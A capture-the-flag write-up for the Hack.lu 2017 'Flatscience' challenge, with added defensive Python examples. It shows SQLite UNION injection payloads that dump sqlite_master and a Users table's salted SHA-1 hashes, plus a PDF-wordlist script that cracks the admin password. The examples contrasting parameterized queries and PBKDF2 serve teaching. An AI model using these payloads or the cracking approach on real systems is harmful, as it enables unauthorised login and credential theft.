Chybeta

Hack.lu CTF 2017-Flatscience-writeup

SQLite injection
brute force

Task

The Professor on Flat Earth is Prof. Flux Horst. Only for bragging he made his own Blog showcasing his favorite Papers. Being the only Professor, he thinks he is the smartest Person around the Plate. Can you prove him wrong and log into his Admin-Panel?
Link https://flatscience.flatearth.fluxfingers.net/

Solution

The site's basic function is offering a pile of papers for download, 30 PDFs in total. The basic structure of the site is as follows:

Visiting https://flatscience.flatearth.fluxfingers.net/robots.txt gives:

User-agent: *
Disallow: /login.php
Disallow: /admin.php

There is a login page: https://flatscience.flatearth.fluxfingers.net/login.php

Under view-source:

Visiting https://flatscience.flatearth.fluxfingers.net/login.php?debug reveals the source code:

<?php
if(isset($_POST['usr']) && isset($_POST['pw'])){
    $user = $_POST['usr'];
    $pass = $_POST['pw'];
    $db = new SQLite3('../fancy.db');
    $res = $db->query("SELECT id,name from Users where name='".$user."' and password='".sha1($pass."Salz!")."'");
    if($res){
        $row = $res->fetchArray();
    }
    else{
        echo "<br>Some Error occourred!";
    }
    if(isset($row['id'])){
        setcookie('name',' '.$row['name'], time() + 60, '/');
        header("Location: /");
        die();
    }
}
if(isset($_GET['debug']))
    highlight_file('login.php');
?>

The script receives the usr and pw parameters via POST and puts them into the SQL query without any filtering. If the id field of the query result is non-empty, setcookie is executed, which writes the name field of the result into the cookie.

Consider the following request:

https://flatscience.flatearth.fluxfingers.net/login.php
POST:
usr=%27 UNION SELECT name, sql from sqlite_master--+&pw=chybeta

Note that SQLite's comment marker is --. After the input is substituted, the injected query becomes:

SELECT id,name from Users where name=' ' UNION SELECT name, sql from sqlite_master-- and password= 'chybeta'

Everything from `and` onwards is commented out. The UNION pulls rows from the SQLite system table (sqlite_master), so the value returned as id is really the table's name (name) and the value returned as name is really the statement that created the table (sql).

That is:

CREATE TABLE Users(
    id int primary key,
    name varchar(255),
    password varchar(255),
    hint varchar(255)
)
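To make the injection and its fix concrete, here is an added Python example (not code from the original writeup or the challenge) that rebuilds the Users table from the dumped CREATE statement in an in-memory SQLite database with constructed rows, runs the login query exactly the way login.php concatenates it, and then runs the same query with placeholders. The payload from above reads sqlite_master through the concatenated version, while the parameterized version treats the same input as a literal user name and returns nothing. Function names, the sample rows and the admin password are my own.

```python
import hashlib
import sqlite3

# Schema as dumped from sqlite_master in the writeup.
SCHEMA = """CREATE TABLE Users(
    id int primary key,
    name varchar(255),
    password varchar(255),
    hint varchar(255)
)"""

# The writeup's payload after URL decoding ("%27" -> "'", "+" -> space).
PAYLOAD = "' UNION SELECT name, sql from sqlite_master-- "


def salted_sha1(password: str) -> str:
    """login.php's hashing scheme: sha1(password . "Salz!")."""
    return hashlib.sha1((password + "Salz!").encode("utf-8")).hexdigest()


def make_db() -> sqlite3.Connection:
    """In-memory copy of the Users table with constructed sample rows."""
    db = sqlite3.connect(":memory:")
    db.execute(SCHEMA)
    db.executemany(
        "INSERT INTO Users VALUES (?, ?, ?, ?)",
        [
            (1, "admin", salted_sha1("constructed-admin-password"),
             "my fav word in my fav paper?!"),
            (2, "hansi", salted_sha1("password"), "the password is password"),
        ],
    )
    return db


def login_concat(db: sqlite3.Connection, user: str, pw: str) -> list:
    """Vulnerable form, mirroring login.php: input spliced into the SQL text."""
    sql = ("SELECT id,name from Users where name='" + user
           + "' and password='" + salted_sha1(pw) + "'")
    return db.execute(sql).fetchall()


def login_param(db: sqlite3.Connection, user: str, pw: str) -> list:
    """Hardened form: bound parameters, so the input can only ever be a value."""
    return db.execute(
        "SELECT id,name from Users where name=? and password=?",
        (user, salted_sha1(pw)),
    ).fetchall()


def leaked_schema(rows: list) -> dict:
    """Map the (id, name) rows the injection returned to name -> sql."""
    return {name: sql for name, sql in rows}


if __name__ == "__main__":
    db = make_db()
    print("concatenated:", leaked_schema(login_concat(db, PAYLOAD, "x")))
    print("parameterized:", login_param(db, PAYLOAD, "x"))
    print("real login:", login_param(db, "hansi", "password"))
```

With the concatenated query the comment marker swallows the password check and the UNION returns sqlite_master rows, including the CREATE TABLE text above; with placeholders the identical input simply matches no user name. Note that parameterization fixes the injection but not the hashing scheme, which is what the rest of the writeup exploits.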

Combining that statement with the following injection payloads:

usr=%27 UNION SELECT id, id from Users limit 0,1--+&pw=chybeta
usr=%27 UNION SELECT id, name from Users limit 0,1--+&pw=chybeta
usr=%27 UNION SELECT id, password from Users limit 0,1--+&pw=chybeta
usr=%27 UNION SELECT id, hint from Users limit 0,1--+&pw=chybeta

By changing the offset, the rows of the table can be read out one by one.

name    password                                    hint
admin   3fab54a50e770d830c0416df817567662a9dc85c    my fav word in my fav paper?!
fritze  54eae8935c90f467427f05e4ece82cf569f89507    my love is…?
hansi   34b0bb7c304949f9ff2fc101eef0f048be10d3bd    the password is password

Looking the hashes up directly turned up nothing. Look at the source again:

$res = $db->query("SELECT id,name from Users where name='".$user."' and password='".sha1($pass."Salz!")."'");

and at the hint:

my fav word in my fav paper?!

So download all the PDFs on the site (about 30) and try the words in the papers against the hash. The final script is as follows:

# Ported to Python 3 (pdfminer.six); same logic as the original Python 2 script.
import hashlib
import os
from io import StringIO

from pdfminer.converter import TextConverter
from pdfminer.layout import LAParams
from pdfminer.pdfinterp import PDFPageInterpreter, PDFResourceManager
from pdfminer.pdfpage import PDFPage

# admin's sha1(password + "Salz!") as dumped from the Users table
TARGET = '3fab54a50e770d830c0416df817567662a9dc85c'
SALT = 'Salz!'


def get_pdf():
    # every downloaded paper in the current directory
    return [i for i in os.listdir("./") if i.endswith("pdf")]


def convert_pdf_2_text(path):
    # extract the text layer of one PDF with pdfminer
    rsrcmgr = PDFResourceManager()
    retstr = StringIO()
    device = TextConverter(rsrcmgr, retstr, laparams=LAParams())
    interpreter = PDFPageInterpreter(rsrcmgr, device)
    with open(path, 'rb') as fp:
        for page in PDFPage.get_pages(fp, set()):
            interpreter.process_page(page)
    text = retstr.getvalue()
    device.close()
    retstr.close()
    return text


def find_password():
    # hash every space-separated token of every paper and compare with TARGET
    for i in get_pdf():
        print("Searching word in " + i)
        pdf_text = convert_pdf_2_text(i).split(" ")
        for word in pdf_text:
            sha1_password = hashlib.sha1((word + SALT).encode('utf-8')).hexdigest()
            if sha1_password == TARGET:
                print("Find the password :" + word)
                return word
    return None


if __name__ == "__main__":
    find_password()

The password is: ThinJerboa
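Why a hint and a stack of papers were enough: login.php stores sha1(password + "Salz!"), a single fixed salt shared by every account, so each candidate word costs one SHA-1 and one dictionary pass covers all users at once. The added Python example below (not from the writeup) puts that scheme beside a PBKDF2 scheme with a random per-user salt; the function names and the stored-hash format string are my own choices.

```python
import hashlib
import hmac
import os
from typing import Optional

STATIC_SALT = b"Salz!"  # the one server-wide salt from login.php


def legacy_hash(password: str) -> str:
    """The site's scheme: sha1(password + "Salz!").

    Deterministic across accounts: two users with the same password
    store the same 40-hex-char value, and a guess is one cheap SHA-1.
    """
    return hashlib.sha1(password.encode("utf-8") + STATIC_SALT).hexdigest()


def legacy_verify(password: str, stored: str) -> bool:
    return hmac.compare_digest(legacy_hash(password), stored)


def pbkdf2_hash(password: str, salt: Optional[bytes] = None,
                iterations: int = 600_000) -> str:
    """Per-user random salt plus a slow KDF, encoded as algo$iters$salt$dk.

    The salt is generated here, not shared; the format is my own.
    """
    if salt is None:
        salt = os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"


def pbkdf2_verify(password: str, stored: str) -> bool:
    """Recompute with the salt and iteration count stored beside the digest."""
    algo, iters, salt_hex, dk_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        return False
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                             bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(dk.hex(), dk_hex)


def shared_password_collides(scheme_hash, password: str = "password") -> bool:
    """True if two accounts with the same password store an identical value,
    i.e. one cracked hash (or one dictionary pass) immediately covers both."""
    return scheme_hash(password) == scheme_hash(password)


if __name__ == "__main__":
    print("legacy collides:", shared_password_collides(legacy_hash))
    print("pbkdf2 collides:", shared_password_collides(pbkdf2_hash))
    stored = pbkdf2_hash("ThinJerboa")
    print(stored)
    print("verify ok:", pbkdf2_verify("ThinJerboa", stored))
```

With the legacy scheme the hint "the password is password" for hansi would also unlock any other account that chose the same word, and the dictionary built from the papers is tried once for all three hashes. With a per-user random salt the same dictionary has to be rerun for every account, and each attempt costs hundreds of thousands of HMAC-SHA-256 iterations instead of one SHA-1.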

Visit https://flatscience.flatearth.fluxfingers.net/admin.php, log in, and get the flag:

flag{Th3_Fl4t_Earth_Prof_i$_n0T_so_Smart_huh?}